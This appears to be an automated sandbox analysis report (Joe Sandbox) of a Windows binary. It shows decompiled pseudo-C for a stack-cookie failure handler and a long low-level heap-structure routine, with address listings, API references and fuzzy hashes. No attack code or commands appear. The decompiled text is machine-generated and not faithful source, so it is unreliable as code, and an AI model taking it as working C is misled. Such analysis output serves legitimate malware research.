                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E00C564EA(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xc5fbf8; // 0xbb40e64e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xc60820 = _t6;
				 *0xc6081c = _t22;
				 *0xc60818 = _t25;
				 *0xc60814 = _t21;
				 *0xc60810 = _t27;
				 *0xc6080c = _t26;
				 *0xc60838 = ss;
				 *0xc6082c = cs;
				 *0xc60808 = ds;
				 *0xc60804 = es;
				 *0xc60800 = fs;
				 *0xc607fc = gs;
				asm("pushfd");
				_pop( *0xc60830);
				 *0xc60824 =  *_t31;
				 *0xc60828 = _v0;
				 *0xc60834 =  &_a4;
				 *0xc60770 = 0x10001;
				_t11 =  *0xc60828; // 0x0
				 *0xc60724 = _t11;
				 *0xc60718 = 0xc0000409;
				 *0xc6071c = 1;
				_t12 =  *0xc5fbf8; // 0xbb40e64e
				_v812 = _t12;
				_t13 =  *0xc5fbfc; // 0x44bf19b1
				_v808 = _t13;
				 *0xc60768 = IsDebuggerPresent();
				_push(1);
				E00C57BC0(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xc5d2ec);
				if( *0xc60768 == 0) {
					_push(1);
					E00C57BC0(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564ea
                                                                                                                        0x00c564f0
                                                                                                                        0x00c564f2
                                                                                                                        0x00c564f2
                                                                                                                        0x00c59ba5
                                                                                                                        0x00c59baa
                                                                                                                        0x00c59bb0
                                                                                                                        0x00c59bb6
                                                                                                                        0x00c59bbc
                                                                                                                        0x00c59bc2
                                                                                                                        0x00c59bc8
                                                                                                                        0x00c59bcf
                                                                                                                        0x00c59bd6
                                                                                                                        0x00c59bdd
                                                                                                                        0x00c59be4
                                                                                                                        0x00c59beb
                                                                                                                        0x00c59bf2
                                                                                                                        0x00c59bf3
                                                                                                                        0x00c59bfc
                                                                                                                        0x00c59c04
                                                                                                                        0x00c59c0c
                                                                                                                        0x00c59c17
                                                                                                                        0x00c59c21
                                                                                                                        0x00c59c26
                                                                                                                        0x00c59c2b
                                                                                                                        0x00c59c35
                                                                                                                        0x00c59c3f
                                                                                                                        0x00c59c44
                                                                                                                        0x00c59c4a
                                                                                                                        0x00c59c4f
                                                                                                                        0x00c59c5b
                                                                                                                        0x00c59c60
                                                                                                                        0x00c59c62
                                                                                                                        0x00c59c6a
                                                                                                                        0x00c59c75
                                                                                                                        0x00c59c82
                                                                                                                        0x00c59c84
                                                                                                                        0x00c59c86
                                                                                                                        0x00c59c8b
                                                                                                                        0x00c59c9f

                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00C59C55
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C59C6A
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00C5D2EC), ref: 00C59C75
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00C59C91
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00C59C98
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303529838.0000000000C51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C50000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.303519410.0000000000C50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303544198.0000000000C5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303551513.0000000000C5F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.303557762.0000000000C62000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_c50000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 6308545dc2395d5f7a9a7b7cc509d73cfdc01916a7304ff66b74050d53cb78fb
                                                                                                                        • Instruction ID: e5fc4215cbcd68610ccca9ff04e8af3c2406579e30e826a48a95dd5616933788
                                                                                                                        • Opcode Fuzzy Hash: 6308545dc2395d5f7a9a7b7cc509d73cfdc01916a7304ff66b74050d53cb78fb
                                                                                                                        • Instruction Fuzzy Hash: 8721BFB8401305DFD760DF56E98474A3BE4FB4C312F20946AE909A32A2D7F19585CF99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 01365BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 88%
                                                                                                                        			E01365BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1371178);
				E012ED0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01364C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E012DD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01365542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13860e8;
								if( *0x13860e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13860e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E012D9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E012D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E012DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E012DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E012DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E012DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E012DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E012DF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E012DF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = L01364CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E012ED130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                        0x01365ba5
                                                                                                                        0x01365baa
                                                                                                                        0x01365baf
                                                                                                                        0x01365bb4
                                                                                                                        0x01365bb6
                                                                                                                        0x01365bbc
                                                                                                                        0x01365bbe
                                                                                                                        0x01365bc4
                                                                                                                        0x01365bcd
                                                                                                                        0x01365bd3
                                                                                                                        0x01365bd6
                                                                                                                        0x01365bdc
                                                                                                                        0x01365be0
                                                                                                                        0x01365be3
                                                                                                                        0x01365beb
                                                                                                                        0x01365bf2
                                                                                                                        0x01365bf8
                                                                                                                        0x01365bfe
                                                                                                                        0x01365c04
                                                                                                                        0x01365c0e
                                                                                                                        0x01365c18
                                                                                                                        0x01365c1f
                                                                                                                        0x01365c25
                                                                                                                        0x01365c2a
                                                                                                                        0x01365c2c
                                                                                                                        0x01365c32
                                                                                                                        0x01365c3a
                                                                                                                        0x01365c3f
                                                                                                                        0x01365c42
                                                                                                                        0x01365c48
                                                                                                                        0x01365c5b
                                                                                                                        0x01365c5b
                                                                                                                        0x01365c2c
                                                                                                                        0x01365cb7
                                                                                                                        0x01365cb9
                                                                                                                        0x01365cbf
                                                                                                                        0x01365cc2
                                                                                                                        0x01365cca
                                                                                                                        0x01365ccb
                                                                                                                        0x01365ccb
                                                                                                                        0x01365cd1
                                                                                                                        0x01365cd7
                                                                                                                        0x01365cda
                                                                                                                        0x01365ce1
                                                                                                                        0x01365ce4
                                                                                                                        0x01365ce7
                                                                                                                        0x01365ced
                                                                                                                        0x01365cf3
                                                                                                                        0x01365cf9
                                                                                                                        0x01365cff
                                                                                                                        0x01365d08
                                                                                                                        0x01365d0a
                                                                                                                        0x01365d0e
                                                                                                                        0x01365d10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365d16
                                                                                                                        0x01365d1a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365d20
                                                                                                                        0x01365d22
                                                                                                                        0x01365d25
                                                                                                                        0x01365d2f
                                                                                                                        0x01365d2f
                                                                                                                        0x01365d33
                                                                                                                        0x01365d3d
                                                                                                                        0x01365d49
                                                                                                                        0x01365d4b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365d5a
                                                                                                                        0x01365d5d
                                                                                                                        0x01365d60
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365d66
                                                                                                                        0x01365d69
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x01365d6f
                                                                                                                        0x01365d6f
                                                                                                                        0x01365d73
                                                                                                                        0x01365d79
                                                                                                                        0x01365d7f
                                                                                                                        0x01365d86
                                                                                                                        0x01365d95
                                                                                                                        0x01365d98
                                                                                                                        0x01365dba
                                                                                                                        0x01365dcb
                                                                                                                        0x01365dce
                                                                                                                        0x01365dd3
                                                                                                                        0x01365dd6
                                                                                                                        0x01365dd8
                                                                                                                        0x01365de6
                                                                                                                        0x01365dec
                                                                                                                        0x01365dee
                                                                                                                        0x01365df1
                                                                                                                        0x01365df3
                                                                                                                        0x0136635a
                                                                                                                        0x0136635a
                                                                                                                        0x00000000
                                                                                                                        0x0136635a
                                                                                                                        0x01365dfe
                                                                                                                        0x01365e02
                                                                                                                        0x01365e05
                                                                                                                        0x01365e07
                                                                                                                        0x01365e10
                                                                                                                        0x01365e13
                                                                                                                        0x01365e1b
                                                                                                                        0x01365e1c
                                                                                                                        0x01365e21
                                                                                                                        0x01365e22
                                                                                                                        0x01365e23
                                                                                                                        0x01365e25
                                                                                                                        0x01365e2a
                                                                                                                        0x01365e2c
                                                                                                                        0x01365e2e
                                                                                                                        0x01365e36
                                                                                                                        0x01365e39
                                                                                                                        0x01365e42
                                                                                                                        0x01365e47
                                                                                                                        0x01365e4d
                                                                                                                        0x01365e54
                                                                                                                        0x01365e54
                                                                                                                        0x01365e54
                                                                                                                        0x01365e2e
                                                                                                                        0x01365e5c
                                                                                                                        0x01365e5f
                                                                                                                        0x01365e62
                                                                                                                        0x01365e64
                                                                                                                        0x01365e6b
                                                                                                                        0x01365e70
                                                                                                                        0x01365e7a
                                                                                                                        0x01365e7a
                                                                                                                        0x01365e7a
                                                                                                                        0x01365e6b
                                                                                                                        0x01365e7e
                                                                                                                        0x01365e7f
                                                                                                                        0x01365e7f
                                                                                                                        0x01365e81
                                                                                                                        0x01365e87
                                                                                                                        0x01365e8b
                                                                                                                        0x01365e8c
                                                                                                                        0x01365e8c
                                                                                                                        0x01365e8c
                                                                                                                        0x01365e9a
                                                                                                                        0x01365e9c
                                                                                                                        0x01365ea2
                                                                                                                        0x01365ea6
